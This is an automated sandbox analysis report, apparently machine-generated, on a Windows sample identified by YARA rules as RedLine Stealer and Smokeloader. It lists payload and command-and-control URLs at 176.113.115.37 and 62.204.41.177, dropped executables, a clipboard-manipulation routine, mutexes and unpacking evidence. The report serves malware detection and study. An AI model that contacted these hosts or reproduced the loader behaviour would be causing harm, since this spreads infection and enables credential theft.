                  Source: GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe)a
                  Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
                  Source: GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeDT
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/6
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php$
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpN
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpZ
                  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpf
                  Source: A865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177i
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/=
                  Source: GK059kPZ5B.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEe
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A51947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_00A51947
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A5237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_00A5237D
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A52621 NtdllDefWindowProc_W,PostQuitMessage,0_2_00A52621
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004280420_2_00428042
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004071D00_2_004071D0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004373F90_2_004373F9
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004274A40_2_004274A4
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042D50E0_2_0042D50E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004285800_2_00428580
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004166CF0_2_004166CF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0043D6980_2_0043D698
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004137450_2_00413745
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004278160_2_00427816
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0040E9990_2_0040E999
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00427AC00_2_00427AC0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00418ACF0_2_00418ACF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042EB000_2_0042EB00
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00436CDF0_2_00436CDF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00427D870_2_00427D87
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00413F2B0_2_00413F2B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A641920_2_00A64192
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A7ED670_2_00A7ED67
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A782A90_2_00A782A9
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A787E70_2_00A787E7
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A7770B0_2_00A7770B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A7D7750_2_00A7D775
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A639AC0_2_00A639AC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A669360_2_00A66936
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A77A7D0_2_00A77A7D
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A5EC000_2_00A5EC00
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A77D270_2_00A77D27
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A68D360_2_00A68D36
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A7ED670_2_00A7ED67
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A77FEE0_2_00A77FEE
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A86F460_2_00A86F46
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: String function: 00410740 appears 53 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: String function: 00A609A7 appears 53 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: String function: 0040F928 appears 36 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: String function: 0040FDD7 appears 125 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: String function: 00A6003E appears 121 times
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: String function: 004045C0 appears 317 times
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324
                  Source: GK059kPZ5B.exeBinary or memory string: OriginalFileName vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exe, 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exe, 00000000.00000003.2133255224.0000000000AC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs GK059kPZ5B.exe
                  Source: GK059kPZ5B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: GK059kPZ5B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: A865.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00869ED6 CreateToolhelp32Snapshot,Module32First,0_2_00869ED6
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,2_2_00413720
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htmJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeMutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3640
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeFile created: C:\Users\user\AppData\Local\Temp\A865.tmpJump to behavior
                  Source: GK059kPZ5B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: GK059kPZ5B.exeReversingLabs: Detection: 50%
                  Source: unknownProcess created: C:\Users\user\Desktop\GK059kPZ5B.exe "C:\Users\user\Desktop\GK059kPZ5B.exe"
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeProcess created: C:\Users\user\AppData\Local\Temp\A865.tmp.exe "C:\Users\user\AppData\Local\Temp\A865.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeProcess created: C:\Users\user\AppData\Local\Temp\A865.tmp.exe "C:\Users\user\AppData\Local\Temp\A865.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeUnpacked PE file: 2.2.A865.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeUnpacked PE file: 0.2.GK059kPZ5B.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeUnpacked PE file: 2.2.A865.tmp.exe.400000.1.unpack
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00410786 push ecx; ret 0_2_00410799
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0086F0F7 pushad ; ret 0_2_0086F113
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0086B1FE push E8665AC8h; iretd 0_2_0086B203
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0086F275 push ecx; ret 0_2_0086F292
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0086D7B9 push FFFFFFADh; ret 0_2_0086D82B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0086CAEC push 00000003h; ret 0_2_0086CAF0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0086AD23 push es; iretd 0_2_0086AD34
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A60018 push ecx; ret 0_2_00A6002B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A879BF push esp; retf 0_2_00A879C7
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A609ED push ecx; ret 0_2_00A60A00
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A89E08 pushad ; retf 0_2_00A89E0F
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A87FBD push esp; retf 0_2_00A87FBE
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0041B035 push ecx; ret 2_2_0041B048
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0040020D pushfd ; iretd 2_2_00400211
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0084E80A push eax; ret 2_2_0084E819
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0084B82B push 7DD07DC0h; iretd 2_2_0084B83C
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0084AD25 pushfd ; iretd 2_2_0084AD28
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0084E7FB push eax; ret 2_2_0084E819
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0084972C push esp; iretd 2_2_0084972D
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022EB29C push ecx; ret 2_2_022EB2AF
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D0F59 pushfd ; iretd 2_2_022D1078
                  Source: GK059kPZ5B.exeStatic PE information: section name: .text entropy: 7.663584602800402
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.481613035763361
                  Source: A865.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.481613035763361
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeFile created: C:\Users\user\AppData\Local\Temp\A865.tmp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E999
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
